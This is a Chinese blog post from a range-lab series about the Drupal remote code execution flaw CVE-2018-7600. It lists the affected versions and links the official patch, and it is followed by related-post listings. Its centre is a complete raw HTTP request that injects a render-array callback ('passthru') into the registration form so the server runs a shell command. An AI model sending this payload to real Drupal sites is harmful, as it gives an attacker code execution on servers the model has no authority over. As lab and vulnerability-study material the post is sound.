Drupal远程代码执行漏洞(CVE-2018-7600)

于 2024-04-10 13:24:45 发布
阅读量482 收藏 5
点赞数 8
分类专栏: 靶场计划 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xnrjyswy/article/details/137592785
版权

一、漏洞描述

Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。

Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。

二、影响版本

Drupal 7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。

三、POC

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 靶机地址
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://靶机地址/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
Content-Length: 626
Connection: close

-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"

passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"

markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"

ls -l /tmp
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"

user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"

四、漏洞复现

五、官方补丁

Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002 | Drupal.org

一颗小黑橙
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
vulfocus——drupal1代码执行(CVE-2018-7600)
m0_62063669的博客
09-07 904
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。函数会把第一个参数作为回调函数,之后的参数作为回调函数的参数。有特殊的处理,攻击者可利用Drupal表单渲染的问题执行恶意代码,达到完全控制。时就会提示可能导致代码执行Drupal的问题稍显常规,来自。是用户可控的,这就导致了。
drupal cve-2018-7600 远程代码执行漏洞 简介
whatday的专栏
06-13 1557
漏洞分析 Drupal 在 3 月 28 日爆出一个远程代码执行漏洞CVE 编号 CVE-2018-7600,通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理,比如如下的数组: $form['choice_wrapper'] = array( '#tree' => FALSE, '#weight' => -4, '#prefix' => '<div class="clearfix" id="po
drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现
seek_2022的博客
12-17 4090
CVE-2018-7600漏洞学习与复现
Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600
limb0的博客
07-04 6707
Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600) 一、漏洞介绍 2018年3月28日,Drupal官方发布新补丁和安全公告,宣称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞执行恶意代码,导致网站被完全控制。 漏洞影响范围: 截止2018年3月29日,还未有公开PoC Drupal 6.x版本 Drupal 7.x版本 Drupal 8.x版本 二、漏洞危害 远程代码执行。 三、漏洞验证 环境搭建: 实验环
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 1467
drupal命令执行
CVE-2018-7600Drupal 8 远程代码执行漏洞
Mr_atopos的博客
06-07 2729
使用vulhub搭建环境使用vulhub搭建环境出现了一些问题,这里直接使用BUU的环境 BUU CEV-2018-7600进去也要初始化环境,一开始语言选择英文,数据库选择SQLite 其他的可以随便设置 进入 这个漏洞可能出现在填写表单的地方,该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置可以利用注册用户来进行漏洞利用先随便输入测试 通过查阅 Drupal代码和文档,可以知道,对于
Drupal漏洞Drupal 7.31 SQL漏洞
2301_77778745的博客
04-25 536
1.通过python调用drupal7.x.py脚本对数据库进行注入。test test(后面两个test是新设的用户名和密码)2.输入命令:python drupal7.x.py。
渗透测试part(三):Vulhub配置及打靶(以Drupal CVE-2018-7600为例)
m0_56592545的博客
06-25 1060
本系列总共分成了三个部分,在第一部分中对渗透测试进行了简要的概述,第二部分通过VMware搭建了Vulnhub的一个靶机,第三部分则在Ubuntu操作系统中基于Vulhub搭建了一个靶机并借助kali的Metasploit工具快速完成了对Drupal的渗透。t=N5K3t=N5K3t=N5K3t=N5K3t=N5K3打靶-vulhub靶场-drupal-CVE-2018-7600_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1Tv4y1C7GC/?
cve-2018-7600 drupal核心远程代码执行漏洞分析
whatday的专栏
07-16 708
0x01 漏洞介绍 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 0x02 漏洞分析 Drupal渲染数组的情况有页面加载和Ajax表单发出的请求,在这里Ajax API调用是攻.
CVE-2018-7600 Drupal 远程代码执行漏洞
星落的博客
04-07 763
漏洞介绍 Drupal 是一款用量庞大的CMS,在Form API中存在一处远程代码执行漏洞。 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 环境搭建 1.切换到drupal相关目录下,部署docker环境 cd/root/vulhub/weblogic/CVE-2018-7600 docker-compose build docker-compose up -d 2.查看docker服务器情况 dock ps -a 3.环境启动后,访问`htt..
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件
10-23
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件 具体利用方法可以参见http://blog.csdn.net/kikaylee/article/details/40400643
Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340)
07-10
使用docker-compose命令一步搭建Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340) 的漏洞环境
CVE-2018-7600
05-14
CVE-2018-7600-master CVE-2018-7600-master CVE-2018-7600-master在我的文章有复现欢迎交流
drupal 代码执行 (CVE-2018-7600)复现
YouthBelief的博客
11-04 2584
@[TOC](drupal 代码执行 (CVE-2018-7600)) drupal 代码执行 (CVE-2018-7600) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 0x01 漏洞描述 http://blog.nsfocus.net/cve-2018-7600-analysis/ 该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻
漏洞复现】Drupal 远程代码执行漏洞(CVE-2018-7600)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 834
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。...
"drupal < 7.32 \"drupalgeddon\" sql injection vulnerability (cve-2014-3704)漏洞"
最新发布
10-28
Drupal <7.32版本中存在一个名为“Drupalgeddon”的SQL注入漏洞漏洞编号为CVE-2014-3704。 SQL注入是一种常见的网络安全漏洞,它允许攻击者通过在输入中注入恶意的SQL代码来干扰或绕过应用程序的数据库查询。在Drupal版本7.32以前,因为对用户输入的处理不完善,攻击者可以通过特殊构造的输入来执行恶意的SQL操作。 在Drupalgeddon漏洞中,攻击者可以利用这个漏洞执行各种恶意的操作,包括获取敏感数据、篡改或删除数据库中的数据,甚至完全控制受影响的Drupal网站。 为了修复这个漏洞Drupal开发团队推出了补丁程序,所有受影响的用户都被建议尽快升级到Drupal的7.32版本或更高的版本。升级到最新版本可以修复这个漏洞,并增强系统的安全性。 此外,通过使用Web应用程序防火墙(WAF)或其他安全性插件,可以进一步增强对SQL注入漏洞的保护。这些插件可以根据已知的攻击模式和行为规则来检测和阻止SQL注入攻击尝试。 总而言之,对于Drupal <7.32版本的用户,及时升级到最新版本,并采取额外的安全措施,是防止“Drupalgeddon” SQL注入漏洞被利用的关键步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值